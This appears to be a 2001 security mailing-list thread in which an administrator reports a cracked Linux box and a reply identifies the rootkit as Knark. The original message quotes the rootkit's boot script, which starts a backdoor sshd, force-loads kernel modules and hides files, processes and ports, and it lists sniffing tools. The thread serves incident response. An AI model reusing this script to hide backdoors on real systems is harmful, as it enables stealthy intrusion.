Re: Cracked. Possible(?) new rootkit ?

[Michael Witt <bravens1 () earthlink net>]

Greetings,

The rootkit you found is called KNARK.  KNARK is a first generation kernel
rootkit that is designed to exclusively exploit the LINUX 2.2 kernel. Not
only is Tripwire ineffective against this rootkit, but the standard practice
of using "good binaries" on a floppy or CD is unsuccessful as well.  Since
the kernel itself is rootkitted, the kernel always use it's binaries vice
the binaries that are valid located on a floppy or CD.  The kernel rootkits
were described at both the 2000 FIRST and 2000 Blackhat Conferences as "game
over" if they get installed because of the immense difficulty in identifying
that a system has actually had the kernel rootkit installed.

Impact:  KNARK will allow the intruder to continue to operate in stealth
mode.  This kernel rootkit also installs a tool that allows the rootkit to
move files/data from the compromised system through a backdoor.

More information concerning KNARK and KMOD (Solaris kernel rootkit) and the
rootkits themselves can be found the following website:  www.gothacked.net

Mike Witt
Riptech, Inc.

----- Original Message -----
From: "maarten van den Berg" <maarten () VBVB NL>
To: <INCIDENTS () SECURITYFOCUS COM>
Sent: Wednesday, February 14, 2001 10:21 AM
Subject: Cracked. Possible(?) new rootkit ?


> Hi
>
> Maybe I'm mistaken and this is old stuff, but...
>
> I recently found a box which was obviously cracked, at least all the
> evidence definitely points that way...:
>
>
> After a (kernel-)upgrade, some service led to crashing the whole machine.
> The service in question was called "system", and this is what
> /etc/rc.d/rc3.d/S99system looks like:
>
> _____ cut here ______
> #!/bin/sh
> #
> # This script will be executed *after* all the other init scripts.
> # You can put your own initialization stuff in here if you don't
> # want to do the full Sys V style init stuff.
>
> /var/kerb/ssh.d > /dev/null 2> /dev/null
>
> /sbin/insmod -f /var/kerb/supernw.o > /dev/null 2> /dev/null
> /sbin/insmod -f /var/kerb/supermd.o > /dev/null 2> /dev/null
>
> /bin/kill -31 `/var/kerb/pidof ssh.d` > /dev/null 2> /dev/null
>
> #exec redir
> #/var/kerb/ered /usr/sbin/in.ftpd /usr/bin/in.ftpd
>
> /var/kerb/nethide ":1F98" > /dev/null 2> /dev/null
> /var/kerb/nethide ":1F91" > /dev/null 2> /dev/null
> /var/kerb/nethide ":1F92" > /dev/null 2> /dev/null
>
> #/var/kerb/hidef /usr/bin/in.ftpd > /dev/null 2> /dev/null
>
> /var/kerb/hidef /var/kerb > /dev/null 2> /dev/null
> /var/kerb/hidef /var/kerb/ered > /dev/null 2> /dev/null
> /var/kerb/hidef /var/kerb/nethide > /dev/null 2> /dev/null
> /var/kerb/hidef /var/kerb/pidof > /dev/null 2> /dev/null
> /var/kerb/hidef /var/kerb/rexec > /dev/null 2> /dev/null
> /var/kerb/hidef /var/kerb/ssh.d > /dev/null 2> /dev/null
> /var/kerb/hidef /var/kerb/k.a > /dev/null 2> /dev/null
> /var/kerb/hidef /var/kerb/sd.a > /dev/null 2> /dev/null
> /var/kerb/hidef /var/kerb/supernw.o > /dev/null 2> /dev/null
> /var/kerb/hidef /var/kerb/supermd.o > /dev/null 2> /dev/null
> /var/kerb/hidef /var/kerb/p > /dev/null 2> /dev/null
> /var/kerb/hidef /var/kerb/l > /dev/null 2> /dev/null
> /var/kerb/hidef /var/kerb/s > /dev/null 2> /dev/null
>
> /var/kerb/hidef /etc/rc.d/rc3.d/S99system > /dev/null 2> /dev/null
> /var/kerb/hidef /etc/rc.d/rc5.d/S99system > /dev/null 2> /dev/null
>
> /var/kerb/hidef /var/kerb/hidef > /dev/null 2> /dev/null
>
> _____ cut here _____
>
> Judging just from the file, an alternative sshd (ssh.d) is started, two
> kernel-modules are inserted, a binary hides certain strings in something
> network-related, and a binary 'hidef' hides everything including itself.
>
> I have not had time yet to do any more research, but I bet it was just
> pure luck that this toolkit didn't function well under a new kernel, thus
> exposing itself...  I know what to do now, reinstall from scratch, but I
> was wondering if this is interesting stuff for the list, or that it is
> merely the Nth+1 crack of a Redhat box (not MY favorite flavour, btw) with
> a well-known rootkit etc.
>
> Oh, and by the way: Before discovery, I ran chkrootkit v 0.19, but that
> didn't detect anything, running or otherwise.
>
>
> Maarten
>
>
> _____ Listing of /var/kerb/ _____
>
>
> drwxr-xr-x root/ftp          0 2000-07-27 21:40:46 kerb/
> drwxr-xr-x root/root         0 2000-07-12 03:43:50 kerb/s/
> -rwxr-xr-x root/root    129076 2000-07-12 03:20:11 kerb/s/dsniff
> -rwxr-xr-x root/root     20100 2000-07-12 03:20:16 kerb/s/arpredirect
> -rw-r--r-- root/root      1009 2000-07-12 03:43:50 kerb/s/dsniff.services
> -rwxr-xr-x root/root     93580 2000-07-12 03:26:17 kerb/s/urlsnarf
> -rwxr-xr-x root/ftp      13468 2000-07-12 08:29:59 kerb/ered
> -rwxr-xr-x root/ftp       3984 2000-07-12 08:29:59 kerb/hidef
> -rw-r--r-- root/ftp        537 2000-07-12 08:29:59 kerb/k.a
> -rwxr-xr-x root/ftp      35016 2000-07-12 08:29:59 kerb/l
> -rwxr-xr-x root/ftp      13036 2000-07-12 08:29:59 kerb/nethide
> -rwxr-xr-x root/ftp      27896 2000-07-12 08:29:59 kerb/p
> -rwxr-xr-x root/ftp       8128 2000-07-12 08:29:59 kerb/pidof
> -rw------- root/ftp        512 2001-02-14 16:01:40 kerb/sd.a
> -rwxr-xr-x root/ftp     196408 2000-07-12 08:29:59 kerb/ssh.d
> -rw-r--r-- root/ftp        960 2000-07-12 08:29:59 kerb/supermd.o
> -rw-r--r-- root/ftp      12292 2000-07-12 08:29:59 kerb/supernw.o
>
> _____ end of listing _____